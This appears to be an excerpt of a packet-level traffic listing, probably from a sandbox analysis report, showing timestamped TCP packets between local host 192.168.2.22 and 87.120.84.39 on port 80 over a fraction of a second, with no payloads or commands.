                                                                                                                                  Nov 19, 2024 18:08:04.726497889 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726574898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726624966 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726629019 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726639986 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726650953 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726660967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726713896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726742029 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726757050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726767063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726775885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726787090 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726798058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726824999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726829052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726835966 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726890087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726890087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726919889 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726931095 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726939917 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726949930 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726959944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.727008104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.727008104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.727008104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.727027893 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.727037907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.727046967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.727057934 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.727102041 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.727102041 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.727102041 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.730551004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.730564117 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.730572939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.730626106 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.730626106 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.731089115 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.731101036 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.731110096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.731121063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.731142044 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.731142044 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756660938 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756840944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756846905 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756850004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756864071 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756875038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756885052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756902933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.756903887 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756903887 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756932974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756932974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.756973028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757003069 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757018089 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757041931 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757051945 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757061958 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757071972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757081985 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757141113 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757141113 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757141113 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757302046 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757313013 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757325888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757334948 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757350922 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757360935 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757370949 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757380009 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757390022 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757400036 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757409096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757416964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757417917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757417917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757417917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757417917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757417917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757421017 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.757451057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.757451057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797051907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797106981 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797116995 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797177076 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797188044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797198057 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797198057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797199011 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797210932 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797221899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797221899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797235012 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797287941 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797343016 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797420979 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797429085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797499895 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797509909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797519922 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797530890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797537088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797537088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797557116 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797648907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797660112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797669888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797679901 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797692060 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797699928 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797709942 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.797796965 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797796965 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797796965 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.797796965 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798019886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798029900 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798039913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798048973 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798059940 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798069954 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798079967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798089981 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798100948 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798114061 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798120022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798120022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798120022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798120022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798120022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798147917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798147917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798646927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798659086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798671007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798681974 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798732996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798743963 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798753977 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798763990 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798777103 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798787117 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798788071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.798845053 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816171885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816196918 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816209078 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816219091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816231012 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816241026 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816251993 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816262960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816272020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816272020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816272020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816272020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816324949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816324949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816601038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816617012 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816628933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816679001 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816679001 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816724062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816735983 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816746950 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816759109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816776991 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816786051 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816795111 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816795111 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816795111 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816812992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816814899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816824913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816834927 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816834927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816848040 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816850901 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816884995 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816884995 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816885948 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.816896915 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.816909075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817011118 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817011118 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817042112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817050934 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817061901 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817074060 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817085028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817095041 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817094088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817094088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817106009 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817132950 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817178011 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817194939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817204952 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817222118 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817231894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817241907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817254066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817262888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817265034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817276955 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817297935 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817297935 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817321062 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817329884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817361116 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817370892 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817404985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817404985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817486048 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817497015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817509890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817519903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817531109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817548037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817548037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817570925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817572117 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817572117 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817600965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817611933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.817667007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817667961 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.817667961 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835676908 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835694075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835705042 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835721016 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835732937 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835741997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835756063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835756063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835791111 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835794926 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835807085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835817099 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835828066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835834026 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835845947 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835849047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835859060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835860968 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835872889 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.835880995 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835892916 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.835907936 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.836071968 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847412109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847424030 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847433090 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847461939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847472906 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847484112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847484112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847485065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847496033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847507000 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847521067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847541094 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847644091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847688913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847695112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847701073 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847733974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847765923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847776890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847789049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847812891 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847829103 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847923994 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847934961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847944975 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847954988 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847965956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847968102 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847976923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847979069 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.847989082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.847995996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.848000050 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.848006010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.848018885 CET4916180192.168.2.2287.120.84.39
